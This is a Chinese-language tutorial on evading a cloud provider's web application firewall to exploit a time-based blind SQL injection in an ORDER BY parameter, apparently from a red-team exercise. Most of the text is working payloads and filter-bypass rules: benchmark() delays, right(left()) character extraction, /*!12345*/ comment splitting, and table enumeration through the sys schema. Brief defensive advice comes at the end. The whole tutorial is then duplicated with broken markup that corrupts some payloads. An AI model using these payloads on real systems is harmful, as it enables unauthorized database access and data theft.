某云WAF绕过技巧详解<\/h1>

1. 注入点识别与初步测试<\/h2>

1.1 发现注入点<\/h3>

在HW攻防活动中发现的目标URL：<\/p>

\/api\/customerPolicy\/selectPolicy?tag=&input=&policyCategory=&voidDate=&certificateUnit=&status=&nature1=&nature2=&areas=1&city=&title=&publishType=&belongAreas=&orderType=1&page=1&pageSize=10&ts=175082141514&orderBy=1
<\/code><\/pre>
关键点<\/strong>：<\/p>

orderType<\/code>参数加单引号报错<\/li>
参数名orderType<\/code>和orderBy<\/code>暗示可能存在ORDER BY注入<\/li>
<\/ul>
1.2 初步注入测试<\/h3>
尝试时间盲注：<\/p>
orderType=1+or+(select*from(select(sleep(3)))x)
<\/code><\/pre>
结果：被某云WAF拦截<\/p>
2. WAF绕过技术详解<\/h2>
2.1 WAF规则分析<\/h3>
通过分段测试确定WAF拦截规则：<\/p>



测试输入<\/th>
拦截情况<\/th>
结论<\/th>
<\/tr>
<\/thead>


1 or (select)<\/code><\/td>
不拦截<\/td>
WAF不拦截单独的关键字<\/td>
<\/tr>

1 or (select*)<\/code><\/td>
拦截<\/td>
拦截select+任意字符组合<\/td>
<\/tr>

1 or (select 0)<\/code><\/td>
拦截<\/td>
拦截select后跟空格和内容<\/td>
<\/tr>

1 or (select())<\/code><\/td>
拦截<\/td>
拦截select后跟括号<\/td>
<\/tr>
<\/tbody>
<\/table>
2.2 Y函数绕过技术<\/h3>
使用y(point(1,1))<\/code>函数成功绕过WAF：<\/p>
orderType=1+or+y(point(1,1))
<\/code><\/pre>
特点<\/strong>：<\/p>

不常见函数组合<\/li>
不会引起报错<\/li>
能正常返回数据<\/li>
<\/ul>
2.3 时间盲注绕过<\/h3>
2.3.1 绕过sleep()函数<\/h4>
sleep(1)<\/code>被拦截，尝试替代方案：<\/p>
benchmark(51111111,1)
<\/code><\/pre>
成功构造延时注入：<\/p>
orderType=1+or+y(point(1,1))+or+(select\/**\/0\/**\/from(select\/**\/benchmark(51111111,1))x)
<\/code><\/pre>
2.3.2 添加条件判断<\/h4>
加入if<\/code>判断未被拦截：<\/p>
orderType=1+or+y(point(1,1))+or+(select\/**\/0\/**\/from(select\/**\/if(1=1,benchmark(51111111,1),1))x)
<\/code><\/pre>
2.4 字符串处理函数绕过<\/h3>
2.4.1 基本函数测试<\/h4>

ascii()<\/code>：未被拦截<\/li>
substr()<\/code>：被拦截<\/li>
<\/ul>
2.4.2 替代substr()的方法<\/h4>
使用right(left())<\/code>组合：<\/p>
right(left(1,1),1)
<\/code><\/pre>
完整示例：<\/p>
orderType=1+or+y(point(1,1))+or+(select\/**\/0\/**\/from(select\/**\/if(ascii(right(left(1,1),1))=1,benchmark(51111111,1),1))x)
<\/code><\/pre>
2.5 数据库信息获取绕过<\/h3>
2.5.1 绕过user()\/database()\/version()<\/h4>
拦截规则<\/strong>：<\/p>

database<\/code>：不拦截<\/li>
database()<\/code>：拦截<\/li>
user<\/code>：不拦截<\/li>
user()<\/code>：拦截<\/li>
version<\/code>：不拦截<\/li>
version()<\/code>：拦截<\/li>
<\/ul>
结论<\/strong>：WAF拦截的是关键字+()的组合<\/p>
2.5.2 绕过方法<\/h4>

使用反引号``绕过（仅适用于version()）<\/li>
使用\/*!12345*\/<\/code>注释语法：<\/li>
<\/ol>
orderType=1+or+y(point(1,1))+or+(select\/**\/0\/**\/from(select\/**\/if(ascii(right(left(database\/*!12345*\/,1),1))!=1,benchmark(51111111,1),1))x)
<\/code><\/pre>
2.6 信息schema绕过<\/h3>
2.6.1 拦截规则<\/h4>

information_schema<\/code>：不拦截<\/li>
information_schema.x<\/code>：拦截（拦截点号连接）<\/li>
<\/ul>
2.6.2 替代方案<\/h4>
使用sys.schema_auto_increment_columns<\/code>：<\/p>
orderType=1+or+y(point(1,1))+or+(select\/**\/0\/**\/from(select\/**\/if(ascii(right(left((select\/*!5555555*\/group_concat(table_name)\/*!12345*\/from\/*!12345*\/(sys.schema_auto_increment_columns\/*!12345*\/)),1),1))!=1,benchmark(51111111,1),1))x)
<\/code><\/pre>
3. 完整注入流程示例<\/h2>

确认注入点存在：<\/li>
<\/ol>
orderType=1+or+y(point(1,1))
<\/code><\/pre>

确认时间盲注可行：<\/li>
<\/ol>
orderType=1+or+y(point(1,1))+or+(select\/**\/0\/**\/from(select\/**\/benchmark(51111111,1))x)
<\/code><\/pre>

获取数据库信息：<\/li>
<\/ol>
orderType=1+or+y(point(1,1))+or+(select\/**\/0\/**\/from(select\/**\/if(ascii(right(left(database\/*!12345*\/,1),1))!=1,benchmark(51111111,1),1))x)
<\/code><\/pre>

获取表名信息：<\/li>
<\/ol>
orderType=1+or+y(point(1,1))+or+(select\/**\/0\/**\/from(select\/**\/if(ascii(right(left((select\/*!5555555*\/group_concat(table_name)\/*!12345*\/from\/*!12345*\/(sys.schema_auto_increment_columns\/*!12345*\/)),1),1))!=1,benchmark(51111111,1),1))x)
<\/code><\/pre>
4. 关键技巧总结<\/h2>


Y函数技巧<\/strong>：y(point(1,1))<\/code>是不常见的函数组合，能有效绕过WAF检测<\/p>
<\/li>

函数调用绕过<\/strong>：<\/p>

使用\/*!12345*\/<\/code>分割函数名和括号<\/li>
例如：database\/*!12345*\/<\/code>代替database()<\/code><\/li>
<\/ul>
<\/li>

字符串处理替代<\/strong>：<\/p>

用right(left())<\/code>组合代替被拦截的substr()<\/code><\/li>
<\/ul>
<\/li>

延时函数选择<\/strong>：<\/p>

优先使用benchmark()<\/code>代替被拦截的sleep()<\/code><\/li>
<\/ul>
<\/li>

信息schema替代<\/strong>：<\/p>

使用sys.schema_auto_increment_columns<\/code>代替被拦截的information_schema.tables<\/code><\/li>
<\/ul>
<\/li>

注释技巧<\/strong>：<\/p>

灵活使用\/**\/<\/code>和\/*!12345*\/<\/code>分割敏感关键字<\/li>
<\/ul>
<\/li>
<\/ol>
5. 防御建议<\/h2>

对ORDER BY参数进行严格类型检查，强制转换为整数<\/li>
实现参数白名单机制，限制可排序的字段<\/li>
监控异常SQL执行模式，特别是包含不常见函数组合的查询<\/li>
定期更新WAF规则，加入对y(point())<\/code>等非常用函数组合的检测<\/li>
限制数据库用户权限，避免使用高权限账户连接数据库<\/li>
<\/ol>

测试输入<\/th>	拦截情况<\/th>	结论<\/th> <\/tr> <\/thead>
`1 or (select)<\/code><\/td>`	不拦截<\/td>	WAF不拦截单独的关键字<\/td> <\/tr>
`1 or (select*)<\/code><\/td>`	拦截<\/td>	拦截select+任意字符组合<\/td> <\/tr>
`1 or (select 0)<\/code><\/td>`	拦截<\/td>	拦截select后跟空格和内容<\/td> <\/tr>
`1 or (select())<\/code><\/td>`	拦截<\/td>	拦截select后跟括号<\/td> <\/tr> <\/tbody> <\/table> 2.2 Y函数绕过技术<\/h3> 使用`y(point(1,1))<\/code>函数成功绕过WAF：<\/p>` orderType=1+or+y(point(1,1)) <\/code><\/pre> 特点<\/strong>：<\/p> 不常见函数组合<\/li> 不会引起报错<\/li> 能正常返回数据<\/li> <\/ul> 2.3 时间盲注绕过<\/h3> 2.3.1 绕过sleep()函数<\/h4> sleep(1)<\/code>被拦截，尝试替代方案：<\/p> benchmark(51111111,1) <\/code><\/pre> 成功构造延时注入：<\/p> orderType=1+or+y(point(1,1))+or+(select\/\/0\/\/from(select\/\/benchmark(51111111,1))x) <\/code><\/pre> 2.3.2 添加条件判断<\/h4> 加入if<\/code>判断未被拦截：<\/p> orderType=1+or+y(point(1,1))+or+(select\/\/0\/\/from(select\/\/if(1=1,benchmark(51111111,1),1))x) <\/code><\/pre> 2.4 字符串处理函数绕过<\/h3> 2.4.1 基本函数测试<\/h4> ascii()<\/code>：未被拦截<\/li> substr()<\/code>：被拦截<\/li> <\/ul> 2.4.2 替代substr()的方法<\/h4> 使用right(left())<\/code>组合：<\/p> right(left(1,1),1) <\/code><\/pre> 完整示例：<\/p> orderType=1+or+y(point(1,1))+or+(select\/\/0\/\/from(select\/*\/if(ascii(right(left(1,1),1))=1,benchmark(51111111,1),1))x) <\/code><\/pre> 2.5 数据库信息获取绕过<\/h3> 2.5.1 绕过user()\/database()\/version()<\/h4> 拦截规则<\/strong>：<\/p> database<\/code>：不拦截<\/li> database()<\/code>：拦截<\/li> user<\/code>：不拦截<\/li> user()<\/code>：拦截<\/li> version<\/code>：不拦截<\/li> version()<\/code>：拦截<\/li> <\/ul> 结论<\/strong>：WAF拦截的是关键字+()的组合<\/p> 2.5.2 绕过方法<\/h4> 使用反引号``绕过（仅适用于version()）<\/li> 使用\/!12345\/<\/code>注释语法：<\/li> <\/ol> orderType=1+or+y(point(1,1))+or+(select\/\/0\/\/from(select\/\/if(ascii(right(left(database\/!12345\/,1),1))!=1,benchmark(51111111,1),1))x) <\/code><\/pre> 2.6 信息schema绕过<\/h3> 2.6.1 拦截规则<\/h4> information_schema<\/code>：不拦截<\/li> information_schema.x<\/code>：拦截（拦截点号连接）<\/li> <\/ul> 2.6.2 替代方案<\/h4> 使用sys.schema_auto_increment_columns<\/code>：<\/p> orderType=1+or+y(point(1,1))+or+(select\/\/0\/\/from(select\/\/if(ascii(right(left((select\/!5555555\/group_concat(table_name)\/!12345\/from\/!12345\/(sys.schema_auto_increment_columns\/!12345\/)),1),1))!=1,benchmark(51111111,1),1))x) <\/code><\/pre> 3. 完整注入流程示例<\/h2> 确认注入点存在：<\/li> <\/ol> orderType=1+or+y(point(1,1)) <\/code><\/pre> 确认时间盲注可行：<\/li> <\/ol> orderType=1+or+y(point(1,1))+or+(select\/\/0\/\/from(select\/\/benchmark(51111111,1))x) <\/code><\/pre> 获取数据库信息：<\/li> <\/ol> orderType=1+or+y(point(1,1))+or+(select\/\/0\/\/from(select\/\/if(ascii(right(left(database\/!12345\/,1),1))!=1,benchmark(51111111,1),1))x) <\/code><\/pre> 获取表名信息：<\/li> <\/ol> orderType=1+or+y(point(1,1))+or+(select\/\/0\/\/from(select\/\/if(ascii(right(left((select\/!5555555\/group_concat(table_name)\/!12345\/from\/!12345\/(sys.schema_auto_increment_columns\/!12345\/)),1),1))!=1,benchmark(51111111,1),1))x) <\/code><\/pre> 4. 关键技巧总结<\/h2> Y函数技巧<\/strong>：y(point(1,1))<\/code>是不常见的函数组合，能有效绕过WAF检测<\/p> <\/li> 函数调用绕过<\/strong>：<\/p> 使用\/!12345\/<\/code>分割函数名和括号<\/li> 例如：database\/!12345\/<\/code>代替database()<\/code><\/li> <\/ul> <\/li> 字符串处理替代<\/strong>：<\/p> 用right(left())<\/code>组合代替被拦截的substr()<\/code><\/li> <\/ul> <\/li> 延时函数选择<\/strong>：<\/p> 优先使用benchmark()<\/code>代替被拦截的sleep()<\/code><\/li> <\/ul> <\/li> 信息schema替代<\/strong>：<\/p> 使用sys.schema_auto_increment_columns<\/code>代替被拦截的information_schema.tables<\/code><\/li> <\/ul> <\/li> 注释技巧<\/strong>：<\/p> 灵活使用\/\/<\/code>和\/!12345*\/<\/code>分割敏感关键字<\/li> <\/ul> <\/li> <\/ol> 5. 防御建议<\/h2> 对ORDER BY参数进行严格类型检查，强制转换为整数<\/li> 实现参数白名单机制，限制可排序的字段<\/li> 监控异常SQL执行模式，特别是包含不常见函数组合的查询<\/li> 定期更新WAF规则，加入对y(point())<\/code>等非常用函数组合的检测<\/li> 限制数据库用户权限，避免使用高权限账户连接数据库<\/li> <\/ol>